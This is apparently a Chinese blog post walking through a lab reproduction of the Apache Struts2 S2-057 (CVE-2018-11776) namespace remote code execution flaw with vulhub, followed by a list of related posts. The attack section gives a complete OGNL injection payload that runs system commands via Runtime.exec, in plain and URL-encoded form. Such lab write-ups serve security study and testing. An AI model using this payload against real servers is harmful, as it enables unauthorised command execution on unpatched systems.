Apache struts2 namespace远程命令执行CVE-2018-11776(S2-057)漏洞复现

最新推荐文章于 2025-02-27 16:08:08 发布
原创 最新推荐文章于 2025-02-27 16:08:08 发布 · 441 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #struts2

本文深入解析了S2-057漏洞,该漏洞源于网站配置XML时未充分过滤namespace值,允许攻击者执行远程代码及系统命令。文章涵盖了受影响版本、环境搭建步骤及攻击测试方法。
部署运行你感兴趣的模型镜像
一:漏洞介绍

S2-057漏洞产生于网站配置xml的时候,有一个namespace的值,该值并没有做详细的安全过滤导致可以写入到xml上,尤其url标签值也没有做通配符的过滤,导致可以执行远程代码以及系统命令到服务器系统中去 。

二:影响版本

Apache Struts 2.3 – Struts 2.3.34
Apache Struts 2.5 – Struts 2.5.16

三:环境搭建

1、利用vulhub搭建环境,进入struts中s2-057漏洞的目录下

cd /vulhub/struts2/s2-057

2、一键搭建环境

docker-compose up -d

3、访问测试页:http://your-ip:8080/struts2-showcase
在这里插入图片描述
环境搭建成功。

四:攻击。

1、访问:http://your-ip:8080/struts2-showcase/$%7B10*10%7D/actionChain1.action抓包,go
在这里插入图片描述
payload中的10*10成功计算出结果并返回。
2、将10*10替换成其它POC。抓包,go。(要将POC转换成url编码)

转换成url编码前:

${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

转换成url编码后:

%24%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3d%23request%5b%27struts.valueStack%27%5d.context).(%23cr%3d%23ct%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ou%3d%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm)).(%23a%3d%40java.lang.Runtime%40getRuntime().exec(%27id%27)).(%40org.apache.commons.io.IOUtils%40toString(%23a.getInputStream()))%7d

在这里插入图片描述

您可能感兴趣的与本文相关的镜像

ACE-Step

ACE-Step

音乐合成
ACE-Step

ACE-Step是由中国团队阶跃星辰(StepFun)与ACE Studio联手打造的开源音乐生成模型。 它拥有3.5B参数量,支持快速高质量生成、强可控性和易于拓展的特点。 最厉害的是,它可以生成多种语言的歌曲,包括但不限于中文、英文、日文等19种语言

[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-057CVE-2018-11776
qq_51577576的博客
12-10 809
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-057CVE-2018-11776漏洞产生于网站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使用通配符namespace时,可能会导致远程代码执行漏洞的发生。同样也可能因为url标签没有设置value和action的值,并且上层动作并没有设置或使用通配符namespace,从而导致远程代码执行漏洞的发生。
vulhub漏洞复现系列之struts2(s2-048、s2-052、S2-053、s2-057、s2-059)
weixin_43071873的博客
12-11 1551
本来想把struts2剩下的靶场全部打完然后写博客分享给大家,但是vulhub搭建实在是太慢了!!!无奈只能先把复现好的这几个分享出来了。 ** (CVE-2017-9791)s2-048 ** 一、漏洞简介 当实用了Struts2 Struts1 插件时,可能导致不受信任的输入传入到ActionMessage类种导致命令执行 二、影响范围 2.3.x 三、漏洞复现: 进入靶场 第一个框填入${4*4},其余两个框随意填 可以看到计算结果回显出来了 Poc: %{(#dm=@ognl.OgnlCon
Apache struts2 namespace远程命令执行CVE-2018-11776(S2-057)漏洞复现
m0_49506405的博客
03-01 4787
S2-057漏洞产生于网站配置xml的时候,有一个namespace的值,该值并没有做详细的安全过滤导致可以写入到xml上,尤其url标签值也没有做通配符的过滤,导致可以执行远程代码以及系统命令到服务器系统中去。 启动环境后,在Win10上访问http://IP:port/struts2-showcase 1.构建Payload: 访问: http://your-ip:8080/struts2-showcase/$%7B233*233%7D/actionChain1.action.
远程代码执行漏洞(CVE-2018-11776)
m0_64662164的博客
01-20 1021
描述: Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。action元素没有设置名称空间属性,或者使用了通配符名称空间将由用户从uri传递并解析为OGNL表达式,最终导致远程代码执行漏洞。,将可以看到Struts2的测试页面。环境启动后,访问`http://启动环境后,访问http://改成id之后会显示出数据库信息。花括号进行url编码。
Struts2 S2-057远程执行代码漏洞CVE-2018-11776
weixin_59872639的博客
03-01 3387
漏洞介绍 名称: struts2 代码执行 (CVE-2018-11776) 描述: Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。 action元素没有设置名称空间属性,或者使用了通配符名称空间将由用户从uri传递并解析为OGNL表达式,最终导致远程代码执行漏洞 影响版本 Struts2.3.34,Struts 2.5.16 漏洞复现 访问靶机地址 .
Apache struts2 namespace远程命令执行_CVE-2018-11776(S2-057)漏洞复现
WY92139010的博客
07-18 328
Apache struts2 namespace远程命令执行_CVE-2018-11776(S2-057)漏洞复现 一、漏洞描述 S2-057漏洞产生于网站配置xml的时候,有一个namespace的值,该值并没有做详细的安全过滤导致可以写入到xml上,尤其url标签值也没有做通配符的过滤,导致可以执行远程代码,以及系统命令到服务器系统中去。 二、漏洞影响版本 Apache ...
Apache Struts 2漏洞分析(CVE-2018-11776/S2-057
weixin_42998420的博客
10-22 1044
概述 定义XML配置时如果namespace值未设置且上层动作配置(Action Configuration)中未设置或用通配符namespace时可能会导致远程代码执行。 url标签未设置value和action值且上层动作未设置或用通配符namespace时可能会导致远程代码执行。 官方解决方案 升级至版本2.3.35或2.5.17。这两个版本仅仅只是更新了安全补丁,不存在兼容性问题。 临时解...
S2057 远程命令执行漏洞CVE-2018-11776
Stephen Wolf
11-23 2051
一、漏洞描述: Apache wiki更新了一个Struts2远程代码执行漏洞(S2-057)漏洞威胁等级为高危,漏洞对应的CVE编号为CVE-2018-11776。 定义XML配置时如果没有设置namespace的值,并且上层动作配置中并没有设置或使用通配符namespace时,可能会导致远程代码执行漏洞的发生。同样也可能因为url标签没有设置value和action的值...
struts2 S2-057(CVE-2018-11776)
Z_l123的博客
03-01 1300
漏洞介绍 该漏洞是由于在Struts2开发框架中使用namespace功能定义XML配置时,namespace值未被设置且在上层动作配置(Action Configuration)中未设置或用通配符namespace,可能导致远程代码执行;url标签未设置value和action值且上层动作未设置或用通配符namespace时可能会导致远程代码执行. 受影响版本 <=Struts2.3.34,Struts 2.5.16 漏洞复现 1.访问地址 http://ip:port/strut..
struts2-057-CVE-2018-11776
weixin_43718688的博客
03-15 276
struts2-057-CVE-2018-11776 搭建环境 首先安装git yum install git-core 安装完成之后运行一下git clone试试,如果出现选项就说明安装成功了。 之后安装docker sudo yum -y install docker-ce 尝试运行一下 docker images 如果出现镜像列表则说明成功安装。接下来就需要安装vulhub了,在这之前,需要先安装pip wget https://bootstrap.pypa.io/get-pip.py python
Struts2远程代码执行漏洞CVE-2018-11776
最新发布
Palpitate_LL的博客
02-27 540
Apache Struts框架是一个基于 Java Servlets,JavaBeans, 和 JavaServer Pages (JSP)的Web应用框架的开源项目,Struts基于Model-View-Controller (MVC)的设计模式,可以用来构件复杂的Web应用。它允许我们分解一个应用程序的商业逻辑、控制逻辑和表现逻辑的代码,使它的重用性和维护性更好。Struts框架是Jakarta工程的一部分,由Apache软件基金会管理。
Struts2-057远程代码执行漏洞(s2-057/CVE-2018-11776)复现
bamanju0574的博客
08-21 1034
参考了大佬的链接:https://github.com/jas502n/St2-057 00x01前言 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web 应用的开源MVC框架,主要提供两个版本框架产品: Struts 1和Struts 2Struts2是一个基于MVC设计模式的Web应用框架...
漏洞解析及复现CVE-2018-11776
zkaqlaoniao的博客
10-29 737
Struts2是一款基于Java开发的框架,web路径下会出现两种特殊的文件格式,即*.action文件与*.jsp文件;它是基于MVC设计模式的Web应用框架,相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。由于在Struts2开发框架中使用namespace功能定义XML配置时,namespace值未被设置且在上层动作配置(Action Configuration)中未设置或用通配符namespace,可能导致远程代码执行。
Struts2 S2-057 远程代码执行漏洞(CVE-2018-11776)
玄道的网安博客
06-30 888
影响环境 Struts<= Struts 2.3.34, Struts 2.5.16 环境搭建 cd vulhub/struts2/s2-057 docker-compose up -d 启动环境后,访问http://your-ip: 8080/show/,您将看到Struts2测试页面。 利用 S2-057要求具备以下条件: action元素没有设置名称空间属性,或者使用了通配符 名称空间将由用户从uri传递并解析为OGNL表达式,最终导致远程代码执行漏洞。 Pa..
Apache Struts2高危漏洞(S2-057CVE-2018-11776
weixin_33835103的博客
09-03 304
花了两天时间,特此记录 一:背景: 2018年8月22日,Apache Strust2发布最新安全公告,Apache Struts2存在远程代码执行的高危漏洞。 二:漏洞产生原理: 1.需要知道对应跳转请求的action名称 2.Struts2框架中的属性设置为: 1) struts.mapper.alwaysSelectFullNamespace = true 2) type...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值